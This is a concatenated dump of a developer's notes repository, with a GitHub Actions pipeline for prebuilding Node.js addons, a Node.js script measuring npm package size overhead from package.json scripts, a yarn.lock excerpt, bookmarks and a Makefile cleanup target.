"https://registry.yarnpkg.com/elliptic/-/elliptic-6.5.2.tgz#05c5678d7173c049d8ca433552224a495d0e3762" 25 | integrity sha512-f4x70okzZbIQl/NSRLkI/+tteV/9WqL98zx+SQ69KbXxmVrmjwsNUPn/gYJJ0sHvEak24cZgHIPegRePAtA/xw== 26 | dependencies: 27 | bn.js "^4.4.0" 28 | brorand "^1.0.1" 29 | hash.js "^1.0.0" 30 | hmac-drbg "^1.0.0" 31 | inherits "^2.0.1" 32 | minimalistic-assert "^1.0.0" 33 | minimalistic-crypto-utils "^1.0.0" 34 | 35 | file-uri-to-path@1.0.0: 36 | version "1.0.0" 37 | resolved "https://registry.yarnpkg.com/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz#553a7b8446ff6f684359c445f1e37a05dacc33dd" 38 | integrity sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw== 39 | 40 | hash.js@^1.0.0, hash.js@^1.0.3: 41 | version "1.1.7" 42 | resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.7.tgz#0babca538e8d4ee4a0f8988d68866537a003cf42" 43 | integrity sha512-taOaskGt4z4SOANNseOviYDvjEJinIkRgmp7LbKP2YTTmVxWBl87s/uzK9r+44BclBSp2X7K1hqeNfz9JbBeXA== 44 | dependencies: 45 | inherits "^2.0.3" 46 | minimalistic-assert "^1.0.1" 47 | 48 | hmac-drbg@^1.0.0: 49 | version "1.0.1" 50 | resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1" 51 | integrity sha1-0nRXAQJabHdabFRXk+1QL8DGSaE= 52 | dependencies: 53 | hash.js "^1.0.3" 54 | minimalistic-assert "^1.0.0" 55 | minimalistic-crypto-utils "^1.0.1" 56 | 57 | inherits@^2.0.1, inherits@^2.0.3: 58 | version "2.0.4" 59 | resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.4.tgz#0fa2c64f932917c3433a0ded55363aae37416b7c" 60 | integrity sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== 61 | 62 | llnode@^2.2.0: 63 | version "2.2.0" 64 | resolved "https://registry.yarnpkg.com/llnode/-/llnode-2.2.0.tgz#376d5588bafb8219837141829cdf42056f92bf44" 65 | integrity sha512-bNTjFMEjvO5iYOmX1HWtqUKuWyOo7nLv2KSEyEv3oojbmzBcp8ZesGVCdmHThL0kF8kcQPjdyWgb1mEsc/1uSg== 66 | dependencies: 67 | bindings "^1.3.0" 68 | node-addon-api "^1.1.0" 69 | 70 | minimalistic-assert@^1.0.0, minimalistic-assert@^1.0.1: 71 | version "1.0.1" 72 | resolved "https://registry.yarnpkg.com/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz#2e194de044626d4a10e7f7fbc00ce73e83e4d5c7" 73 | integrity sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A== 74 | 75 | minimalistic-crypto-utils@^1.0.0, minimalistic-crypto-utils@^1.0.1: 76 | version "1.0.1" 77 | resolved "https://registry.yarnpkg.com/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz#f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a" 78 | integrity sha1-9sAMHAsIIkblxNmd+4x8CDsrWCo= 79 | 80 | node-addon-api@^1.1.0: 81 | version "1.7.1" 82 | resolved "https://registry.yarnpkg.com/node-addon-api/-/node-addon-api-1.7.1.tgz#cf813cd69bb8d9100f6bdca6755fc268f54ac492" 83 | integrity sha512-2+DuKodWvwRTrCfKOeR24KIc5unKjOh8mz17NCzVnHWfjAdDqbfbjqh7gUT+BkXBRQM52+xCHciKWonJ3CbJMQ== 84 | -------------------------------------------------------------------------------- /2020-01-02-github-actions-for-prebuildify/README.md: -------------------------------------------------------------------------------- 1 | # GitHub Actions for prebuilding Node.js Addons 2 | 3 | ### Node.js Addons 4 | 5 | Node.js Addons well described in [documentation](https://nodejs.org/api/addons.html). In general addons provide an interface between JavaScript and C/C++. 6 | 7 | While we can implement a lot of things on JavaScript sometimes it's not wise reinvent the wheel and could be good use already existed libraries. Especially which can be faster, because JavaScript is high-level language with garbage collector. In the end built-in modules are limited with things which you can do in OS. That's why in some cases we need it. 8 | 9 | ### Addons history 10 | 11 | [Addons](https://nodejs.org/api/addons.html) existed in Node.js all time which I remember it (and I used it in June 2013). It's very low level and you need work directly with V8 with some macroses defined by node header. Problem here, that node and V8 are not frozen and change things from time to time, so if you want support more than one version at one time, you will need a lot of `#if` directives and at the end code will be mess. 12 | 13 | Obvious solution with supporting more than one version was create some set of macroses. This was done at August 2013 with [NAN](https://github.com/nodejs/nan). And while this is great project some disadvantages exists. First, NAN version can be major bumped and you will have choice, drop old versions or add new ¯\\_(ツ)_/¯. On new V8 release NAN should be updated (if it was fixed to some specific version) and probably you will need update own code. And of course if you change node version on OS, you will need recompile addons, because previously they was compiled for usage other API. 14 | 15 | In January 2016 Microsoft created Pull Request [nodejs/node/pull/4765](https://github.com/nodejs/node/pull/4765) which brings [ChakraCore](https://github.com/microsoft/chakracore) to Node.js as V8 alternative. In less than 3 months Pull Request with Node API was created: [nodejs/node/pull/11975](https://github.com/nodejs/node/pull/11975). N-API (Node API) was great idea, because we received additional layer which have stable ABI what means that we do not need recompile our modules between node versions anymore. In future only new things will be added and `NAPI_VERSION` will be increased, but rest still will be here (see [N-API Version Matrix](https://nodejs.org/api/n-api.html#n_api_n_api_version_matrix)). 16 | 17 | 31 December 2019 was last day when node@8 was supported (see [End-of-Life Releases](https://github.com/nodejs/Release#end-of-life-releases)) and every supported node version have N-API enabled by default (in node@8 it was still experimental feature, required activation by flag). So now we do not need use V8 directly or NAN, all what we need is [N-API](https://nodejs.org/api/n-api.html) (low level) or [node-addon-api](https://github.com/nodejs/node-addon-api) as C++ wrapper around N-API. 18 | 19 | ### Addons building 20 | 21 | Most simplest way is just ship package code with `binding.gyp`, package manager (npm/yarn) will build addon for developers who install package automatically. Problem is that developers should have tools for it, and while in Linux/MacOS a lot of things exists by default, setup building environment in Windows can be not easy job. Of course this will be done on each package installation and should be done again if node version changed. Another point that libraries headers (if they used) should exists, what sometimes require installation of extra packages. Finally, if installation will be run with `--ignore-scripts` (or if this set to `true` globally) nothing will be compiled. 22 | 23 | As result tools like [prebuild](https://github.com/prebuild/prebuild) / [prebuildify](https://github.com/prebuild/prebuildify) was created. 24 | 25 | Prebuild (Jyly 2016) idea was great, we compile modules for some node versions and upload it to somewhere (GitHub Release Assets usually). When package will be installed, `install` script will check node version and download prebuild addon. In such case we do not need compilation environment. But we sill depend from node version and `install` script. 26 | 27 | Prebuildify (January 2017) was improved version of prebuild. Instead uploading prebuild addons we ship it with package itself. As result if required prebuild addon included we can change node version without problem. We also stop depend from `install` script from this moment (if prebuild exists) and a problem that uploaded prebuild can be changed at any time disappeared (we do not have checksum anywhere and not check it on downloading). Interesting thing that installation with downloading all prebuilds in package usually faster than download one version from some place, and usually package managers cache packages, so second installation much faster. 28 | 29 | ### Building automation 30 | 31 | While it's good to have prebuild and prebuildify we need to build our addon somehow. Of course we can do it locally, but in this case we need cross-compilation tool and building for 3 major OS, probably, available only on MacOS. Also, sometimes cross-compilation is just not possible. All this really hard. And every maintainer who make releases should setup this environment. 32 | 33 | Obvious thing here is use CI/CD: 34 | 35 | - [Travis CI](https://travis-ci.org/): Linux/MacOS 36 | - [CircleCI](https://circleci.com/): Linux/Windows (+MacOS with paid subscription) 37 | - [AppVeyor](https://www.appveyor.com/): Linux/MacOS/Windows 38 | - [GitHub Actions](https://github.com/features/actions): Linux/MacOS/Windows 39 | 40 | I used all of them, each have own advantages and disadvantages, but at current moment for OSS I'd like prefer GitHub Actions. 41 | 42 | Looking in the back when [prebuild-ci](https://github.com/prebuild/prebuild-ci) was released we used Travis for Linux/MacOS and AppVeyor for Windows. 43 | 44 | ### Puzzle solved 45 | 46 | So, right now the best choise by my opinion is use `node-addon-api` and `GitHub Actions`. `NAN` does not makes sense for new addons. `GitHub Actions` have only one totally free alternative — `AppVeyor`, but my personal usage experience with it is not good. 47 | 48 |
49 | GitHub Actions pipeline 50 | 51 | ```yaml 52 | name: Build addon, run tests and package 53 | 54 | on: [push, pull_request] 55 | 56 | jobs: 57 | build-and-test: 58 | name: Build addon 59 | runs-on: ${{ matrix.os }} 60 | strategy: 61 | matrix: 62 | os: 63 | - macos-latest 64 | - ubuntu-latest 65 | - windows-latest 66 | steps: 67 | - name: Fetch code 68 | uses: actions/checkout@v1 69 | with: 70 | submodules: true 71 | 72 | - name: Install dependencies 73 | run: yarn install --ignore-scripts 74 | 75 | - name: Build addon 76 | run: make build-addon 77 | 78 | - name: Get minimal Node.js version from package.json (Linux & macOS) 79 | id: node-version-nix 80 | if: runner.os != 'Windows' 81 | run: echo "::set-output name=version::$(node -p 'require("./package.json").engines.node.match(/(\d.*)$/)[0]')" 82 | 83 | - name: Use Node.js ${{ steps.node-version-nix.outputs.version }} (Linux & macOS) 84 | if: runner.os != 'Windows' 85 | uses: actions/setup-node@v1 86 | with: 87 | node-version: ${{ steps.node-version-nix.outputs.version }} 88 | 89 | - name: Get minimal Node.js version from package.json (Windows) 90 | id: node-version-win 91 | if: runner.os == 'Windows' 92 | run: echo "::set-output name=version::$(node -p 'require(\"./package.json\").engines.node.match(/(\d.*)$/)[0]')" 93 | 94 | - name: Use Node.js ${{ steps.node-version-win.outputs.version }} (Windows) 95 | if: runner.os == 'Windows' 96 | uses: actions/setup-node@v1 97 | with: 98 | node-version: ${{ steps.node-version-win.outputs.version }} 99 | 100 | - name: Run tests for addon 101 | run: make test-tap 102 | 103 | - name: Upload prebuilds 104 | uses: actions/upload-artifact@v1 105 | with: 106 | name: addon-${{ runner.os }} 107 | path: prebuilds 108 | 109 | package: 110 | name: Build package 111 | needs: build-and-test 112 | runs-on: ubuntu-latest 113 | steps: 114 | - name: Fetch code 115 | uses: actions/checkout@v1 116 | with: 117 | fetch-depth: 1 118 | 119 | - name: Install dependencies 120 | run: yarn install --ignore-scripts 121 | 122 | - name: Download macOS addon 123 | uses: actions/download-artifact@v1 124 | with: 125 | name: addon-macOS 126 | 127 | - name: Download Linux addon 128 | uses: actions/download-artifact@v1 129 | with: 130 | name: addon-Linux 131 | 132 | - name: Download Windows addon 133 | uses: actions/download-artifact@v1 134 | with: 135 | name: addon-Windows 136 | 137 | - name: Move addons to one folder 138 | run: mkdir prebuilds && mv ./addon-*/* ./prebuilds/ 139 | 140 | - name: list 141 | run: find prebuilds 142 | 143 | - name: Build package 144 | run: make package 145 | 146 | - name: Get package version from package.json 147 | id: pkg-version 148 | run: echo "::set-output name=version::$(node -p 'require("./package.json").version')" 149 | 150 | - name: Upload package 151 | uses: actions/upload-artifact@v1 152 | with: 153 | name: package 154 | path: keccak-${{ steps.pkg-version.outputs.version }}.tgz 155 | ``` 156 |
157 | 158 | This is real pipeline from [cryptocoinjs/keccak](https://github.com/cryptocoinjs/keccak/). While we have a lot of steps here, things are simple: 159 | 160 | - build addon on different operating systems 161 | - save it as artifacts 162 | - start new job 163 | - download all compiled addons from previous job 164 | - build package 165 | - save package as artifact 166 | 167 | All what we need when job is complete is download package and publish it. Whole process is very smooth. 168 | 169 | _**Happy addons building in 2020!**_ 170 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/README.md: -------------------------------------------------------------------------------- 1 | # The costs of npm-scripts 2 | 3 | 7-8 years ago, when I started work with [Node.js](https://nodejs.org/en/) build automation tools like [Grunt](https://gruntjs.com/) and [Gulp](https://gulpjs.com/) used almost everywhere, sometimes it was [Make](https://www.gnu.org/software/make/). As time went build automation usage shift from tools to simple [npm-scripts](https://docs.npmjs.com/misc/scripts). And I think it's good, because often we do not need complex things and few simple commands is enough. NPM scripts is good place for them. 4 | 5 | In same time I did not seen packages which remove unused `scripts` before package publishing or completely change `package.json`. And now there is a question, how much traffic overhead community receive from storing things in `package.json` and extra `scripts` for package management. 6 | 7 | So I write small script for calculate difference. Script accept npm lock file as input and download packages. Each package unpacked and archive size measured for: 8 | 9 | - Compressed original files. 10 | - Compressed original files with adjusted `npm-scripts`. 11 | - Compressed original files with adjusted `npm-scripts` and stripped `package.json`. 12 | 13 | You can find source code in [stats.js](./stats.js). Before run it, you need install dependencies with `yarn` (`yarn.lock` included). 14 | 15 | I though, which packages I should use for tests and decide stop on: [@babel/core](https://www.npmjs.com/package/@babel/core), [browserify](https://www.npmjs.com/package/browserify) and [webpack](https://www.npmjs.com/package/webpack). 16 | 17 | And results which I received: 18 | 19 | - `@babel/core` (10,866,837 weekly downloads): 20 | 21 | ```bash 22 | noop: 1.31 MB (1306251) 23 | scripts: 1.31 MB (1305016), 1.24 kB (1235) 24 | used: 1.3 MB (1301408), 3.61 kB (3608), 4.84 kB (4843) 25 | ``` 26 | 27 | - `browserify` (647,447 weekly downloads): 28 | 29 | ```bash 30 | noop: 1.81 MB (1808257) 31 | scripts: 1.8 MB (1803016), 5.24 kB (5241) 32 | used: 1.79 MB (1793857), 9.16 kB (9159), 14.4 kB (14400) 33 | ``` 34 | 35 | - `webpack` (8,472,388 weekly downloads): 36 | 37 | ```bash 38 | noop: 5.42 MB (5422115) 39 | scripts: 5.41 MB (5410137), 12 kB (11978) 40 | used: 5.38 MB (5376882), 33.3 kB (33255), 45.2 kB (45233) 41 | ``` 42 | 43 | What all this numbers means? Let's calculate difference for `webpack` as example: 44 | 45 | If we remove undocumented `npm-scripts` from `package.json` we save `12 kB (11978 bytes)`. With 8M weekly downlodas this give us: `11,978 * 8,472,388 / 7 / 1024^3 = 13.5 GiB / day`. 46 | 47 | If in addition to removing undocumented `npm-scripts` we remove undocumented (plus not required) fields from `package.json` we save `45.2 kB (45233 bytes)`. With 8M weekly downloads this give us: `45,233 * 8,472,388 / 7 / 1024^3 = 50.98 GiB / day`. 48 | 49 | All this math is very approximated, becaues part of packages can be cached locally. But numbers really impress, for `webpack` it's roughly `1.5TiB/month` of text which probably not used at all. 50 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "fs-extra": "^8.1.0", 4 | "glob": "^7.1.6", 5 | "pretty-bytes": "^5.3.0", 6 | "standard": "^14.3.1", 7 | "tar": "^5.0.5", 8 | "yargs": "^15.1.0" 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/stats.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | const fs = require('fs').promises 3 | const path = require('path') 4 | const https = require('https') 5 | const glob = require('glob') 6 | const fse = require('fs-extra') 7 | const tar = require('tar') 8 | const yargs = require('yargs') 9 | const prettyBytes = require('pretty-bytes') 10 | 11 | function getArgs () { 12 | return yargs 13 | .usage('Usage: $0 [options]') 14 | .wrap(yargs.terminalWidth()) 15 | .options({ 16 | lock: { 17 | alias: 'l', 18 | default: 'package-lock.json', 19 | description: 'Path to npm lock file', 20 | type: 'string' 21 | }, 22 | 'dir-packages': { 23 | coerce (dir) { 24 | fse.ensureDirSync(dir) 25 | return dir 26 | }, 27 | default: path.join(__dirname, 'packages'), 28 | description: 'Path to directory for downloading and process packages', 29 | type: 'string' 30 | } 31 | }) 32 | .help('help') 33 | .alias('help', 'h').argv 34 | } 35 | 36 | // helpers 37 | async function applyFn (list, fn, workers = 3) { 38 | const result = new Array(list.length) 39 | let i = 0 40 | await Promise.all(new Array(workers).fill(null).map(async () => { 41 | while (i < list.length) result[i] = await fn(list[i++]) 42 | })) 43 | return result 44 | } 45 | 46 | async function callback2promise (fn) { 47 | return new Promise((resolve, reject) => { 48 | return fn((err, ...args) => err ? reject(err) : resolve(args)) 49 | }) 50 | } 51 | 52 | // package-lock.json parser 53 | async function getPackages (file, dirPackages) { 54 | const pkgs = [] 55 | 56 | const lockFileText = await fs.readFile(file, 'utf8') 57 | const deps = Object.values(JSON.parse(lockFileText).dependencies) 58 | while (deps.length > 0) { 59 | const { resolved, dependencies } = deps.pop() 60 | if (!resolved) continue 61 | if (!resolved.startsWith('https://')) { 62 | throw new Error(`URL not supported: "${resolved}"`) 63 | } 64 | 65 | const name = path.parse(resolved).base 66 | const dest = path.join(dirPackages, name) 67 | const destRepack = path.join(dirPackages, `${name}-repack`) 68 | const destUpdated = path.join(destRepack, name) 69 | const destPackageJSON = path.join(destRepack, 'package', 'package.json') 70 | 71 | pkgs.push({ 72 | name, 73 | dest, 74 | destRepack, 75 | destUpdated, 76 | destPackageJSON, 77 | url: resolved 78 | }) 79 | 80 | if (dependencies) deps.push(...Object.values(dependencies)) 81 | } 82 | 83 | return pkgs 84 | } 85 | 86 | // packages download 87 | async function makeRequest (url) { 88 | return new Promise((resolve, reject) => { 89 | const req = https.request(url) 90 | req.on('error', reject) 91 | req.on('timeout', () => { 92 | req.abort() 93 | reject(new Error('Timeout error')) 94 | }) 95 | req.on('response', (resp) => { 96 | if (resp.statusCode !== 200) { 97 | return reject(new Error(`"${resp.statusMessage}" is not OK.`)) 98 | } 99 | 100 | const chunks = [] 101 | resp.on('data', (chunk) => chunks.push(chunk)) 102 | resp.on('end', () => resolve(Buffer.concat(chunks))) 103 | }) 104 | 105 | req.end() 106 | }) 107 | } 108 | 109 | async function downloadPackage (pkg) { 110 | try { 111 | const stat = await fs.stat(pkg.dest) 112 | if (stat.isFile()) return 113 | 114 | throw new Error(`Package is not a file: ${pkg.dest}`) 115 | } catch (err) { 116 | if (err.code !== 'ENOENT') throw err 117 | } 118 | 119 | await fs.writeFile(pkg.dest, await makeRequest(pkg.url)) 120 | console.log(`Package downloaded: ${pkg.name}`) 121 | } 122 | 123 | // package.json change functions 124 | const requiredScriptsKeys = [ 125 | // 'prepublish', 126 | // 'prepare', 127 | // 'prepublishOnly', 128 | // 'prepack', 129 | // 'postpack', 130 | // 'publish', 131 | // 'postpublish', 132 | 'preinstall', 133 | 'install', 134 | 'postinstall', 135 | 'preuninstall', 136 | 'uninstall', 137 | 'postuninstall' 138 | // 'preversion', 139 | // 'version', 140 | // 'postversion', 141 | // 'pretest', 142 | // 'test', 143 | // 'posttest', 144 | // 'prestop', 145 | // 'stop', 146 | // 'poststop', 147 | // 'prestart', 148 | // 'start', 149 | // 'poststart', 150 | // 'prerestart', 151 | // 'restart', 152 | // 'postrestart', 153 | // 'preshrinkwrap', 154 | // 'shrinkwrap', 155 | // 'postshrinkwrap' 156 | ] 157 | 158 | const requiredPackageFields = [ 159 | 'name', 160 | 'version', 161 | 'description', 162 | 'keywords', 163 | 'homepage', 164 | 'bugs', 165 | 'license', 166 | 'author', 167 | 'contributors', 168 | // 'files', 169 | 'main', 170 | 'browser', 171 | 'bin', 172 | 'man', 173 | // 'directories', 174 | 'repository', 175 | 'scripts', 176 | // 'config', 177 | 'dependencies', 178 | // 'devDependencies', 179 | 'peerDependencies', 180 | // 'bundledDependencies', 181 | 'optionalDependencies', 182 | 'engines', 183 | 'os', 184 | 'cpu' 185 | // 'private', 186 | // 'publishConfig' 187 | ] 188 | 189 | const packageJSONUpdate = { 190 | noop (pkg) { 191 | return pkg 192 | }, 193 | scripts (pkg) { 194 | if (pkg.scripts === undefined) return pkg 195 | 196 | const scripts = {} 197 | for (const [key, value] of Object.entries(pkg.scripts)) { 198 | if (requiredScriptsKeys.includes(key)) scripts[key] = value 199 | } 200 | pkg.scripts = scripts 201 | return pkg 202 | }, 203 | used (pkg) { 204 | pkg = packageJSONUpdate.scripts(pkg) 205 | const newPkg = {} 206 | for (const [key, value] of Object.entries(pkg)) { 207 | if (requiredPackageFields.includes(key)) newPkg[key] = value 208 | } 209 | return newPkg 210 | } 211 | } 212 | 213 | // package size 214 | async function getPackageSize (pkg, fileList, packageJSON) { 215 | await fs.writeFile(pkg.destPackageJSON, JSON.stringify(packageJSON)) 216 | 217 | await callback2promise((callback) => { 218 | // Options like in npm: https://github.com/npm/cli/blob/v6.13.6/lib/pack.js#L143 219 | const tarOpt = { 220 | file: pkg.destUpdated, 221 | cwd: pkg.destRepack, 222 | prefix: 'package/', 223 | portable: true, 224 | mtime: new Date('1985-10-26T08:15:00.000Z'), 225 | gzip: true 226 | } 227 | tar.create(tarOpt, fileList, callback) 228 | }) 229 | 230 | const stat = await fs.stat(pkg.destUpdated) 231 | return stat.size 232 | } 233 | 234 | async function getPackgeStats (pkg) { 235 | await fs.rmdir(pkg.destRepack, { recursive: true }) 236 | await fse.ensureDir(pkg.destRepack) 237 | await callback2promise((callback) => { 238 | tar.extract({ 239 | cwd: pkg.destRepack, 240 | file: pkg.dest 241 | }, callback) 242 | }) 243 | 244 | const [fileList] = await callback2promise((callback) => { 245 | glob('**', { 246 | cwd: pkg.destRepack, 247 | nodir: true 248 | }, callback) 249 | }) 250 | 251 | const packageJSONContent = await fs.readFile(pkg.destPackageJSON, 'utf8') 252 | const packageJSON = JSON.parse(packageJSONContent) 253 | 254 | const stats = {} 255 | for (const [name, updateFn] of Object.entries(packageJSONUpdate)) { 256 | stats[name] = await getPackageSize(pkg, fileList, updateFn(packageJSON)) 257 | } 258 | return stats 259 | } 260 | 261 | // 262 | async function main () { 263 | const args = getArgs() 264 | 265 | // read packages from JSON files 266 | const pkgs = await getPackages(args.lock, args.dirPackages) 267 | 268 | // download packages 269 | await applyFn(pkgs, downloadPackage) 270 | 271 | // get package stats 272 | const stats = await applyFn(pkgs, getPackgeStats) 273 | 274 | // calculate total stats 275 | const tStats = stats.reduce((total, obj) => { 276 | for (const key of Object.keys(total)) total[key] += obj[key] 277 | return total 278 | }) 279 | 280 | // print stats 281 | const p2s = (v) => `${prettyBytes(v)} (${v})` 282 | console.log(`noop: ${p2s(tStats.noop)}`) 283 | console.log(`scripts: ${p2s(tStats.scripts)}, ${p2s(tStats.noop - tStats.scripts)}`) 284 | console.log(`used: ${p2s(tStats.used)}, ${p2s(tStats.scripts - tStats.used)}, ${p2s(tStats.noop - tStats.used)}`) 285 | } 286 | 287 | main().catch((err) => { 288 | console.error(err.stack || err) 289 | process.exit(1) 290 | }) 291 | -------------------------------------------------------------------------------- /3rd-party-bookmarked-notes.md: -------------------------------------------------------------------------------- 1 | ## Interesting notes for reading 2 | 3 | - [Node.js](https://nodejs.org/) 4 | 5 | - [Node.js Guides](https://nodejs.org/en/docs/guides/) by Node.js Foundation 6 | - [V8 JavaScript engine: Blog, Docs, JS/WASM features](https://v8.dev/) 7 | - [Node.js event loop](https://blog.insiderattack.net/event-loop-and-the-big-picture-nodejs-event-loop-part-1-1cb67a182810) (5 notes series) by Deepal Jayasekara 8 | - [v8 and thus Node.js performance](https://github.com/thlorenz/v8-perf) by Thorsten Lorenz 9 | 10 | - [WebAssembly](https://webassembly.org/) 11 | 12 | - [Compiling C to WebAssembly without Emscripten](https://dassur.ma/things/c-to-webassembly/) by Surma 13 | 14 | - [Docker](https://www.docker.com/), [Kubernetes](https://kubernetes.io/) and related 15 | 16 | - [What happens when I type kubectl run](https://github.com/jamiehannaford/what-happens-when-k8s) by Jamie Hannaford 17 | - Resource limits in kubernetes: [memory](https://medium.com/@betz.mark/understanding-resource-limits-in-kubernetes-memory-6b41e9a955f9?source=---------6------------------) and [cpu time](https://medium.com/@betz.mark/understanding-resource-limits-in-kubernetes-cpu-time-9eff74d3161b?source=---------5------------------) by Mark Betz 18 | - [Docker network benchmark](http://rabexc.org/posts/docker-networking) by Carlo Contavalli 19 | - [Kubernetes Services and Iptables](https://msazure.club/kubernetes-services-and-iptables/) 20 | 21 | - [git](https://git-scm.com/) 22 | 23 | - [Encrypt secrets in git](https://blog.maddevs.io/secrets-513d41eaaf43) [on russian] by Oleg Puzanov 24 | 25 | - Blogs / Notes / Sites 26 | 27 | - [Brendan D. Gregg](http://www.brendangregg.com/) 28 | - [Julia Evans](https://jvns.ca/) 29 | - [Vyacheslav Egorov](https://mrale.ph/) 30 | - [Frank DENIS](https://00f.net/) 31 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | clean: 2 | # ansible 3 | find -name *.retry -type f -exec rm -rv {} + 4 | 5 | # terraform 6 | find -name .terraform -type d -exec rm -rv {} + 7 | find -name terraform.tfstate -type f -exec rm -rv {} + 8 | find -name terraform.tfstate.backup -type f -exec rm -rv {} + 9 | 10 | # node.js 11 | find -name build -type d -exec rm -rf {} + 12 | find -name node_modules -type d -exec rm -rf {} + 13 | find -name package-lock.json -type f -exec rm -rv {} + 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Some notes stored in [git](https://git-scm.com/) ([Markdown](https://daringfireball.net/projects/markdown/) mostly) and published on [github.com/fanatid/notes](https://github.com/fanatid/notes/). 2 | 3 | Not a native English speaker, please excuse for any language mistakes. 4 | 5 | ### Notes 6 | 7 | - [Dutch auction on Solana blockchain](https://github.com/fanatid/solana-dutch-auction) (2021-06-21) 8 | - [Measure Node.js bindings performance to github.com/w3f/schnorrkel](https://github.com/fanatid/schnorrkel-node-perf) (2021-02-20) 9 | - [Parse bitcoin blocks with C++, Node.js and Rust](https://github.com/fanatid/rust-bitcoin-blocks) (2020-03-30) 10 | - [The costs of npm-scripts](https://github.com/fanatid/notes/tree/master/2020-01-12-cost-of-npm-scripts) (2020-01-12) 11 | - [GitHub Actions for prebuilding Node.js Addons](https://github.com/fanatid/notes/tree/master/2020-01-02-github-actions-for-prebuildify) (2020-01-02) 12 | - [JavaScript, sometimes, is not your friend](https://github.com/fanatid/notes/tree/master/2019-12-18-llnode-elliptic) (2019-12-18) 13 | - [Why you should not left promises in pending state in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-27-node-promise-leaking) (2019-09-27) 14 | - [Module wrapper in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-23-node-module-wrapper) (2019-09-23) 15 | - [Node.js: callback when object Garbage Collected](https://github.com/fanatid/notes/tree/master/2019-09-21-node-object-gc-callback) (2019-09-21) 16 | - [perf_hooks in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-12-node-perf-hooks) (2019-09-12) 17 | - [global.gc in Node.js](https://github.com/fanatid/notes/tree/master/2019-09-09-node-global-gc) (2019-09-09) 18 | - [Package dependents from npmjs.com](https://github.com/fanatid/notes/tree/master/2019-09-01-npm-package-dependents) (2019-09-01) 19 | - [Virtual Machines with libvirt](https://github.com/fanatid/notes/tree/master/2019-08-31-libvirt-usage) (2019-08-31) 20 | - [uvthreads sync vs async in Node.js](https://github.com/fanatid/notes/tree/master/2019-08-30-node-uvthreads-sync-async) (2019-08-30) 21 | - [systemd instead pm2?](https://github.com/fanatid/notes/tree/master/2019-08-23-systemd-instead-pm2) (2019-08-23) 22 | - [DNS in Node.js](https://github.com/fanatid/notes/tree/master/2019-08-22-nodejs-dns) (2019-08-22) 23 | - [CoreDNS tune for external domains in Kubernetes](https://github.com/fanatid/notes/tree/master/2019-08-20-k8s-coredns-tune-for-external-domains) (2019-08-20) 24 | - [Kubernetes setup with kubeadm](https://github.com/fanatid/notes/tree/master/2019-08-19-kubernetes-setup-with-kubeadm) (2019-08-19) 25 | - [Virtual Server with keepalived](https://github.com/fanatid/notes/tree/master/2019-08-18-virtual-server-with-keepalived) (2019-08-18) 26 | - [Load balancing with iptables and IPVS](https://github.com/fanatid/notes/tree/master/2019-08-18-loadbalancer-iptables-ipvs) (2019-08-18) 27 | - [Internal failover IP in Hetzner Cloud with keepalived](https://github.com/fanatid/notes/tree/master/2019-08-06-hetzner-cloud-internal-failover-ip) (2019-08-06) 28 | - [Possible DoS of Insight](https://github.com/fanatid/notes/tree/master/2019-08-04-dos-insight-api) (2019-08-04) 29 | - [Own DNS in VPN](https://github.com/fanatid/notes/tree/master/2019-08-02-vpn-own-dns) (2019-08-02) 30 | - [WireGuard setup guide](https://github.com/fanatid/notes/tree/master/2019-07-28-wireguard-setup-guide) (2019-07-28) 31 | 32 | ### Projects 33 | 34 | - [cryptocoinjs/keccak](https://github.com/cryptocoinjs/keccak) — [Node.js](https://nodejs.org/) bindings to [Keccak sponge function family](https://keccak.team/index.html) 35 | - [cryptocoinjs/secp256k1-node](https://github.com/cryptocoinjs/secp256k1-node) — [Node.js](https://nodejs.org/) bindings to [bitcoin-core/secp256k1](https://github.com/bitcoin-core/secp256k1) 36 | - [indutny/bn.js](https://github.com/indutny/bn.js) — BigNum in pure JavaScript (trying resolve issues and maintain) 37 | - [fanatid/rsyesql](https://github.com/fanatid/rsyesql) — Rust port of [yesql](https://github.com/krisajenkins/yesql), parse of stored SQL in raw files and later usage 38 | - [fanatid/jsyesql](https://github.com/fanatid/jsyesql) — JS port of [yesql](https://github.com/krisajenkins/yesql), parse of stored SQL in raw files and later usage 39 | - [fanatid/make-concurrent](https://github.com/fanatid/make-concurrent) — exclusive or shared access to some resource in JS 40 | - [fanatid/yarn-lock-dedupe](https://github.com/fanatid/yarn-lock-dedupe) — remover of old dependencies in yarn.lock file 41 | - [fanatid/hetzner-robot-mgmt](https://github.com/fanatid/hetzner-robot-mgmt) — experimited tool for state management of dedicated servers on [Hetzner](https://www.hetzner.com/) 42 | 43 | ### Other 44 | 45 | - [3rd party bookmarked notes](./3rd-party-bookmarked-notes.md) 46 | --------------------------------------------------------------------------------